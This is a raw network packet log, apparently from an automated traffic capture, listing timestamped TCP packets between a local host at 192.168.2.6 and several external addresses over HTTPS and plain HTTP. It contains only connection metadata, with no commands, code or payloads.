                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.029541969 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.030549049 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.030575991 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.030740976 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.031580925 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.031591892 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.036197901 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.039995909 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.040010929 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.040823936 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.040828943 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.109792948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.114763021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.130057096 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.133670092 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.134100914 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.134129047 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.137701035 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.137824059 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.138241053 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.138317108 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.138387918 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.138907909 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.139077902 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.139719009 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.139728069 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.140127897 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.140132904 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.146099091 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.146135092 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.146490097 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.147258997 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.147277117 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.190259933 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.190279961 CET49982443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.190295935 CET44349982104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191435099 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191472054 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191663027 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191672087 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191700935 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191817045 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191831112 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.191847086 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192087889 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192138910 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192159891 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192461967 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192620993 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192629099 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192708969 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192867041 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192893028 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.192986965 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193006992 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193097115 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193109035 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193255901 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193269014 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193372965 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.193384886 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.227529049 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.227874994 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.227890015 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.229254961 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.229310036 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.230684996 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.230751991 CET44349978204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.241986990 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.242285967 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.242296934 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.243347883 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.243410110 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.244035959 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.244093895 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.316232920 CET49979443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.316240072 CET44349979204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330861092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330878973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330892086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330914021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330935955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330939054 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330955982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330970049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330981970 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330991030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330995083 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330995083 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330995083 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331005096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331034899 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331034899 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331052065 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331274033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331286907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331302881 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331346989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331362963 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331379890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331392050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331403971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331414938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331425905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331435919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331446886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331453085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331453085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331453085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331470966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331490040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331504107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331516981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331527948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331541061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331554890 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331554890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331576109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331584930 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331584930 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331594944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331607103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331618071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331629038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331633091 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331633091 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331633091 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331641912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331654072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331671000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331684113 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331684113 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331684113 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331686974 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331697941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331701040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331716061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331743002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331748009 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331748962 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331748962 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331758022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331769943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331780910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331793070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331794977 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331809044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331820011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331829071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331829071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331859112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331860065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331859112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331876040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331892967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331907034 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331917048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331944942 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331945896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.331990004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332057953 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332156897 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332169056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332190990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332201958 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332212925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332223892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332252979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332252979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332279921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332279921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332350969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332360983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332370996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332382917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332391977 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332395077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332410097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332420111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332431078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332441092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332448006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332448006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332448006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332453012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332465887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332479000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332479954 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332479954 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332514048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332514048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332559109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332571030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332667112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332676888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332686901 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332696915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332709074 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332726955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332726955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332726955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332739115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332751036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332758904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332758904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332762003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332777977 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332781076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332794905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332809925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332813025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332824945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332835913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332854986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332855940 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332855940 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332865953 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332880974 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332889080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332889080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332890987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332901955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332912922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332917929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332921028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332921028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332930088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332943916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332953930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332968950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332981110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332984924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332984924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332984924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.332992077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333003998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333020926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333020926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333024979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333039999 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333041906 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333053112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333065987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333075047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333086967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333103895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333110094 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333110094 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333110094 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333120108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333137035 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333138943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333156109 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333163023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333174944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333174944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333189011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333199024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.333210945 CET8049910185.215.113.206192.168.2.6
